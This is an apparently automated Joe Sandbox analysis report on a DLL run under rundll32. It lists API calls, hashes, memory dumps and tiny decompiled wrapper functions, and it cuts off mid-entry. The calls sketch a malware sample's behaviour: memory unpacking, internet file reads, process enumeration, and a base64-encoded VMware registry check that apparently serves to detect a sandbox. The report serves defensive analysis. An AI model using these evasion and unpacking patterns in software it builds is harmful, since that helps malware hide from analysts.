Function 026E14A4 Relevance: 3.0, APIs: 2, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,00001000,00000004,?,?), ref: 026E14D3
VirtualProtect.KERNEL32(?,00001000,?,?), ref: 026E14F1

Memory Dump Source

Source File: 00000004.00000002.772727314.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_26e0000_rundll32.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 333d2feefedeb4a11df68bec21991a956e925db56d9e6a2917b24d5a107d6d0d
Instruction ID: 9a7e41faaabc4f8ad0b59beb91b3c9e7948ecb3640d0bccf3e735761dfd2c05b
Opcode Fuzzy Hash: 333d2feefedeb4a11df68bec21991a956e925db56d9e6a2917b24d5a107d6d0d
Instruction Fuzzy Hash: C2F0E933240245AFEF198FA4D885EEE7768DF49398B2001AAF6029E286CA71E651C754

Uniqueness

Uniqueness Score: -1.00%

Function 10006B13 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 17sleepthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0002BF20), ref: 10006AEE

Part of subcall function 10006499: wsprintfA.USER32 ref: 100064F7
Part of subcall function 10006499: ___crtGetTimeFormatEx.LIBCMT ref: 10006546

CreateThread.KERNEL32(00000000,00000000,Function_0000687E,00000000,00000000,00000000), ref: 10006B02

Strings

5762479093, xrefs: 10006AD8

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CreateFormatSleepThreadTime___crtwsprintf
String ID: 5762479093
API String ID: 1808643731-3483958698
Opcode ID: 5756f753bd748c9ff613ad93980cccc3d4190c2db9245a30f4cd3ae4c84e97fb
Instruction ID: 6bf354f83ea36040bb280e8402855d4f416a69cdc8a6264a44d46d68baa0750d
Opcode Fuzzy Hash: 5756f753bd748c9ff613ad93980cccc3d4190c2db9245a30f4cd3ae4c84e97fb
Instruction Fuzzy Hash: 99D0129478421970B061F3F10D07DAF184ECF1A7D17648028FD04B804FE951D51154B3

Uniqueness

Uniqueness Score: -1.00%

Function 026E0063 Relevance: 2.6, APIs: 2, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 026E007E
VirtualFree.KERNELBASE(00000000,?,00004000), ref: 026E00BE

Memory Dump Source

Source File: 00000004.00000002.772727314.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_26e0000_rundll32.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 65a02cd7260d18a01fc3f7ff89687da28b1d4c2f1c2c8b880b6d82bd0f9a86c6
Instruction ID: 3c5303772d13a4459492f8952bd9ce34178cb7eb5a8b8752b54c5685d1e88c24
Opcode Fuzzy Hash: 65a02cd7260d18a01fc3f7ff89687da28b1d4c2f1c2c8b880b6d82bd0f9a86c6
Instruction Fuzzy Hash: 7301A47220A6427EEB318AA19C40F37BBDCDF48712F144C5AFAD6E5190DA65E4418B70

Uniqueness

Uniqueness Score: -1.00%

Function 1000406C Relevance: 1.5, APIs: 1, Instructions: 14
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000406C(void* _a4, char* _a8, int _a12, char* _a16, int _a20, int _a24, struct _SECURITY_ATTRIBUTES* _a28, void** _a32, int* _a36) {
				long _t10;

				_t10 = RegCreateKeyExA(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36); // executed
				return _t10;
			}

0x1000408a
0x10004091

APIs

RegCreateKeyExA.KERNEL32(?,00000000,000F003F,00000000,?,00000000,00000000,80000001,10006D71,?,10006D71,80000001,00000000,00000000,REG_SZ,00000000), ref: 1000408A

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 506b09687f3ab7a414a75766b3d3f90481d321aca35c59e901201fc3ba8e4a5b
Instruction ID: 2f1a498b2dcbf4f3c3eb6ba8bd5ccb29d644f5d642ac185d28254d8eeb3824b8
Opcode Fuzzy Hash: 506b09687f3ab7a414a75766b3d3f90481d321aca35c59e901201fc3ba8e4a5b
Instruction Fuzzy Hash: 5BD09B3200015EFBCF025F81DD058DA3F6AFB4C2A9B0A8654FA1824030C776E9B1AB91

Uniqueness

Uniqueness Score: -1.00%

Function 100040BA Relevance: 1.5, APIs: 1, Instructions: 10
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100040BA(void* _a4, char* _a8, int _a12, int _a16, void** _a20) {
				long _t6;

				_t6 = RegOpenKeyExA(_a4, _a8, _a12, _a16, _a20); // executed
				return _t6;
			}

0x100040cc
0x100040d3

APIs

RegOpenKeyExA.KERNEL32(?,?,?,?,?,?,100044A4,80000000,00000000,00000000,000F003F,?,QXBwbGljYXRpb25zXFxWTXdhcmVIb3N0T3Blbi5leGU=,?,100087CD), ref: 100040CC

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 4a8faa62bcfb3270353cf14121b101114a74a138e05c17fcdee85730a6dc741a
Instruction ID: 325a12e481168666c7c0c00c36f8af78d7d871d703ad2c0798f43e35c83d2956
Opcode Fuzzy Hash: 4a8faa62bcfb3270353cf14121b101114a74a138e05c17fcdee85730a6dc741a
Instruction Fuzzy Hash: A1C0013200060EFBDF025F91EC05CDA3F3AFB182A1B008020FA2804030C773D9B1AB91

Uniqueness

Uniqueness Score: -1.00%

Function 10003F0A Relevance: 1.5, APIs: 1, Instructions: 10
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10003F0A(char* _a4, long _a8, char* _a12, char* _a16, long _a20) {
				void* _t6;

				_t6 = InternetOpenA(_a4, _a8, _a12, _a16, _a20); // executed
				return _t6;
			}

0x10003f1c
0x10003f23

APIs

InternetOpenA.WININET(?,00000000,FFFFFAE1,FFFFFAE1,10006ED5), ref: 10003F1C

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 6ebc564339288df785ab319f2eef5fd975c9d2bdaaabd508592ec2c4882c7e5c
Instruction ID: 3b8007e0c36ccf4b72e51ff36ba8b6d098d3d00fbcb84495eb87ae2067493b1e
Opcode Fuzzy Hash: 6ebc564339288df785ab319f2eef5fd975c9d2bdaaabd508592ec2c4882c7e5c
Instruction Fuzzy Hash: BFC0EC3200020EBBDF025F91EC0589A7F2AEB082A0B008010FA2804021C7339971AB95

Uniqueness

Uniqueness Score: -1.00%

Function 10003ECE Relevance: 1.5, APIs: 1, Instructions: 5
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10003ECE(struct _SECURITY_ATTRIBUTES* _a4, int _a8, CHAR* _a12) {
				void* _t4;

				_t4 = CreateMutexA(_a4, _a8, _a12); // executed
				return _t4;
			}

0x10003eda
0x10003ee0

APIs

CreateMutexA.KERNEL32(?,?,?,10006B61,00000000,00000000,?,?,00000202,?), ref: 10003EDA

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: b0445fb2c580dfef0359de022438c5cf869d669a1619e2cffc7a985e78b4f379
Instruction ID: 0660ba76b91c4ba90ad6f84dc9e800b0fcc5abeceff4b92d4c6b7b19770fb62c
Opcode Fuzzy Hash: b0445fb2c580dfef0359de022438c5cf869d669a1619e2cffc7a985e78b4f379
Instruction Fuzzy Hash: 14B0097A408210BFDF025B90DD4880ABBA2BB88362F24C958F6A941031C732C520EB02

Uniqueness

Uniqueness Score: -1.00%

Function 10003FF7 Relevance: 1.5, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10003FF7(CHAR* _a4, CHAR* _a8, long _a12) {
				long _t4;

				_t4 = GetShortPathNameA(_a4, _a8, _a12); // executed
				return _t4;
			}

0x10004003
0x10004009

APIs

GetShortPathNameA.KERNEL32(?,?,?), ref: 10004003

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: NamePathShort
String ID:
API String ID: 1295925010-0
Opcode ID: 4d5884627ad890fc19a7fce987e6ff622a4b63b76918a6086ce94622cf65f669
Instruction ID: 9ed1efb17d4bc623500ef1ea71d91a7222f1847b1b215a14ca4852d72f61d6bf
Opcode Fuzzy Hash: 4d5884627ad890fc19a7fce987e6ff622a4b63b76918a6086ce94622cf65f669
Instruction Fuzzy Hash: 0DB0097A509210BFDF025B91DE5881ABFB2AB88321F50C95CF6A940031C7328520EB02

Uniqueness

Uniqueness Score: -1.00%

Function 10004104 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10004104(void* _a4, struct tagPROCESSENTRY32W _a8) {
				int _t3;

				_t3 = Process32First(_a4, _a8); // executed
				return _t3;
			}

0x1000410c
0x10004112

APIs

Process32First.KERNEL32(00000000,00000000), ref: 1000410C

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: FirstProcess32
String ID:
API String ID: 2623510744-0
Opcode ID: e67c12039c6e27c9775ed2303caa81bdaef1dde80995cd1ad643f76d7915693a
Instruction ID: c9858dfc005bbdb7cb3bc2a9c9cd704bcf097683957f92dac5198df2e9f65fac
Opcode Fuzzy Hash: e67c12039c6e27c9775ed2303caa81bdaef1dde80995cd1ad643f76d7915693a
Instruction Fuzzy Hash: FCA00275505512ABDA515B51CD4484AFF61BBD4341F01C415F18940034C7359465DB11

Uniqueness

Uniqueness Score: -1.00%

Function 10004115 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10004115(void* _a4, struct tagPROCESSENTRY32W _a8) {
				int _t3;

				_t3 = Process32Next(_a4, _a8); // executed
				return _t3;
			}

0x1000411d
0x10004123

APIs

Process32Next.KERNEL32(00000000,00000000), ref: 1000411D

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: NextProcess32
String ID:
API String ID: 1850201408-0
Opcode ID: a3f922a5f824779d2e4fb6a0605a006c2019e83fe50e179df1dbe93f5432c8bc
Instruction ID: 61c727c5f78705df26fed0ca172bffc95c0448491f66f63664d3ec9bbd55d41d
Opcode Fuzzy Hash: a3f922a5f824779d2e4fb6a0605a006c2019e83fe50e179df1dbe93f5432c8bc
Instruction Fuzzy Hash: B4A00136408612ABDA52AB50CD4888ABFA2BBE8381F11C819F18A41034C73694A5EB12

Uniqueness

Uniqueness Score: -1.00%

Function 1000400A Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000400A(CHAR* _a4) {
				int _t2;

				_t2 = GetDriveTypeA(_a4); // executed
				return _t2;
			}

0x1000400e
0x10004014

APIs

GetDriveTypeA.KERNEL32(?,1000825D,1001594C), ref: 1000400E

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: DriveType
String ID:
API String ID: 338552980-0
Opcode ID: 910e139e7f72f3dc7016df4695e01adbd10b1f6739a032fc72a57664e309aaef
Instruction ID: 35e6a258e9880390de709bccb697b72c0b050f0fde384497e413ae747a6bc5b2
Opcode Fuzzy Hash: 910e139e7f72f3dc7016df4695e01adbd10b1f6739a032fc72a57664e309aaef
Instruction Fuzzy Hash: B29002304042109BDE015B10CE4D4097BA1AB84701B00C454F05540131C7328914EA01

Uniqueness

Uniqueness Score: -1.00%

Function 10004092 Relevance: 1.5, APIs: 1, Instructions: 3
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10004092(void* _a4) {
				long _t2;

				_t2 = RegCloseKey(_a4); // executed
				return _t2;
			}

0x10004096
0x1000409c

APIs

RegCloseKey.KERNEL32(?,10006DCF,?), ref: 10004096

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 008722ebc5c55bf02cf93ee3d880f2bf6535d1cb723afbe45f3708d3cb5b8931
Instruction ID: 429567ee138713cc7d1fb87d8f160ac62efaac39d3f4df16b73647169d7c4b87
Opcode Fuzzy Hash: 008722ebc5c55bf02cf93ee3d880f2bf6535d1cb723afbe45f3708d3cb5b8931
Instruction Fuzzy Hash: 649002705055219BEE015B11CF494097B61ABC4705F008454E04D40030C7319810EA01

Uniqueness

Uniqueness Score: -1.00%

Function 10003EB4 Relevance: 1.5, APIs: 1, Instructions: 3networkCOMMON

Download Yara Rule

APIs

gethostbyname.WS2_32(?), ref: 10003EB8

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: gethostbyname
String ID:
API String ID: 930432418-0
Opcode ID: 05e41723ed0a8037c4578c7a948b0b8a63a99cfb4cc59ac2d943447070d7b44e
Instruction ID: 0d2d6050cfce57933b45c6e53f9aa9dc9bc4905d00d8a83e77bf324908419f10
Opcode Fuzzy Hash: 05e41723ed0a8037c4578c7a948b0b8a63a99cfb4cc59ac2d943447070d7b44e
Instruction Fuzzy Hash: 6A900270545110ABDE015B11CF594197EB1AB88701B148458E48940031C7318810EA01

Uniqueness

Uniqueness Score: -1.00%

Function 10003F72 Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10003F72(char* _a4) {
				int _t2;

				_t2 = PathFileExistsA(_a4); // executed
				return _t2;
			}

0x10003f76
0x10003f7c

APIs

PathFileExistsA.SHLWAPI(00080000,10005C92,?,?,%s\lang.ini,C:\Users\user\Desktop,?,00000000,00080000), ref: 10003F76

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: b54471f397a0d8406c378fc9e06ab65f4bca33af0b81d7c7b1cf25565e94f53f
Instruction ID: 22fc78391477ad96e85b828bbcbeae1f812a7d3dd0aa48fa7cc8604c4f1e63b0
Opcode Fuzzy Hash: b54471f397a0d8406c378fc9e06ab65f4bca33af0b81d7c7b1cf25565e94f53f
Instruction Fuzzy Hash: 5B9002705051109BEE015B11CF494097A61AB84705B008458E05D40031C7719910EE01

Uniqueness

Uniqueness Score: -1.00%

Function 026E002A Relevance: 1.3, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(00000000,?,00004000), ref: 026E00BE

Memory Dump Source

Source File: 00000004.00000002.772727314.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_26e0000_rundll32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: a992a5cacdb97e2c59bd9131508e8a39cd1fdba3109e644b78219f2605f04693
Instruction ID: 740fa05a95178eddfaabdf8e88b0e5252541f1a3181913f3e7cde246bf101f4f
Opcode Fuzzy Hash: a992a5cacdb97e2c59bd9131508e8a39cd1fdba3109e644b78219f2605f04693
Instruction Fuzzy Hash: 1EF02E3255B3916DFA1477347C84A27BB98DF43325B150D9BDC42F6091DE51D8428AF4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 026E0E83 Relevance: 3.0, APIs: 2, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 026E0E92
GetProcAddress.KERNEL32(?,00000000), ref: 026E0EB4

Memory Dump Source

Source File: 00000004.00000002.772727314.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_26e0000_rundll32.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: fb92c6333be858c605df516a8dbac1de34355592668ca30c740f87b13d0c7776
Instruction ID: 9ffd14284f1ce5d290dc9df8c08cbee4f03bb2ba3056dc00070977af4161764f
Opcode Fuzzy Hash: fb92c6333be858c605df516a8dbac1de34355592668ca30c740f87b13d0c7776
Instruction Fuzzy Hash: 1FF08277A111049FEB10CF58C8C09AAF7B1EF942A93298479D886A7314D635FD568A50

Uniqueness

Uniqueness Score: -1.00%

Function 1000B235 Relevance: 1.6, Strings: 1, Instructions: 400COMMON

Download Yara Rule

Strings

K, xrefs: 1000B257

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: K
API String ID: 0-856455061
Opcode ID: 2579a251d1a9acc8374f22f67a4bb7b2891299b7fe2be1df8caa295a5f0ee3c9
Instruction ID: 9aa4ec9f8917db308ce764332d9eea5b3a3a2b02149446eca5bd3df864230787
Opcode Fuzzy Hash: 2579a251d1a9acc8374f22f67a4bb7b2891299b7fe2be1df8caa295a5f0ee3c9
Instruction Fuzzy Hash: 00D1F331104689ADDB21CFAC8C80EFFBBBCAF4AA40F840549FD85CB642D555E92DA771

Uniqueness

Uniqueness Score: -1.00%

Function 1000AED1 Relevance: 1.5, Strings: 1, Instructions: 266COMMON

Download Yara Rule

Strings

K, xrefs: 1000AEF3

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: K
API String ID: 0-856455061
Opcode ID: 40533ac75a34c0e28785cd811d3dcb55fe45dda3d4d2e35189a70ffc9c8f5c8e
Instruction ID: deea517a90883ebe1c394bfda45a9bedc53e3a2fe2376341d0b219587cd6ae1c
Opcode Fuzzy Hash: 40533ac75a34c0e28785cd811d3dcb55fe45dda3d4d2e35189a70ffc9c8f5c8e
Instruction Fuzzy Hash: 719113311046896EDB21CFAD8C80EFFBBBCAF46A40F840549FE85C7642D255E92DA771

Uniqueness

Uniqueness Score: -1.00%

Function 10003F41 Relevance: 1.5, APIs: 1, Instructions: 6
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10003F41(void* _a4, void* _a8, long _a12, DWORD* _a16) {

				return InternetReadFile(_a4, _a8, _a12, _a16);
			}

0x10003f57

APIs

InternetReadFile.WININET(?,?,?,?), ref: 10003F51

Memory Dump Source

Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 6a62bc2528f7a5b567bc78c0f48248627d88bb206eba26def179137dd21eb727
